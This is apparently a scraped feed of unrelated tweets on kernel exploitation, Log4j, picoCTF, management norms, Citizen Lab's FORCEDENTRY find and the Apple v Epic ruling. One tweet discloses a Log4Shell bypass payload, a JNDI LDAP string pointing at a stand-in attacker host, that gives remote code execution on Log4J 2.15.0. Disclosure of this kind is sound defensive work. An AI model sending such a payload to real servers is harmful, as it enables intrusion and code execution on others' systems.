Thrilled to share my new blog post: Put an io_uring on it: Exploiting the Linux kernel. Follow me while I learn a new kernel subsystem and its attack surface, find a 0day, build an exploit, and come up with some new tricks. I go deep and demystify the process.
graplsecurity.com/post/iou-r…
Even as remote work has become normal, too many of us persist with a practice that's a by-product of a hasty transition to remote: Back-to-back meetings without a break, sometimes for hours on end. But we can't just make a new RULE--we need a new NORM. edbatista.com/2022/03/take-f…
😀 I am starting a fundraise for @picoctf. PicoCTF is free to everyone, and costs about $500k a year (🙀) to run. If you've had a positive experience with pico, please reply or DM. I'll use it in my fundraise pitch.
Pls RT for awareness. #ctf #hacking
"What then is the social responsibility of management for these social problems that become chronic complaints or degenerative diseases? They are management’s problems.
...
The health of the community is a prerequisite for successful and growing business."
- Peter Drucker, 1974
Imagine you are writing a system that validates driver's licenses. In the /upload endpoint, you store the image somewhere and enqueue a background request to do the actual validation. When you write the validation logic, you either need a strongly consistent database OR 2/
FIX: Here is a PoC of how to bypass the allowedLdapHost and allowedClasses checks in Log4J 2.15.0 to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} and to bypass allowedClasses just choose a name for a class in the JDK. Deserialization will occur as usual. #Log4Shell 1/n
My #log4j hot take - mitigation is much harder because of the modern trend of vendoring packaging dependencies (in a static binary or in a container).
All the #golang / #Kubernetes / etc. shops should take this as a warning to make sure they could do an emergency upgrade.
I know a service at a former company that hadn't been recompiled/rebuilt in years that probably had to do an emergency upgrade of a bunch of dependencies this weekend. 😢
Emotions MATTER--but a simplistic interpretation of this idea is "My feelings are justified, because they are my feelings. My feelings at this moment take precedence over all other considerations. I have the right to express my feelings any way I see fit." edbatista.com/2021/02/the-ty…
"Having one’s bias confirmed endlessly by a curated cascade of information reflecting back to you your preferences and opinions, second after second, understandably breeds an illusion of certainty. But certainty is nothing like wisdom." ~@ayadakhtar theatlantic.com/magazine/arc…
How do you think about talking about personnel issues in Slack?
Pro: they're a core part of a manager's job (feedback, coaching, etc.)
Con: they could be pretty disastrous if accidentally typed into the wrong text box
@mahorstman @Lethain @skamille @shreyas @staysaasy @edbatista
Stop and UPDATE your iPhones to iOS 14.8 NOW!!! We @citizenlab recovered NSO Group's FORCEDENTRY zero-click exploit (CVE-2021-30860) from the phone of a Saudi activist, and shared w/ Apple, who released iOS 14.8 today with a fix. citizenlab.ca/2021/09/forced…
The Apple v Epic ruling was fascinating to read: s3.documentcloud.org/documen…
Epic breached contract and owes >$3 million.
Apple was NOT a monopoly for mobile gaming and not "coercive", but restricting in-app-payments is "anticompetitive" and Apple has to change policy
🌶 quote: "Apple set its 30% commission rate almost by accident when it first launched the App Store without considering operational costs, benefit to users, or value to developers, that is, both sides of the platform"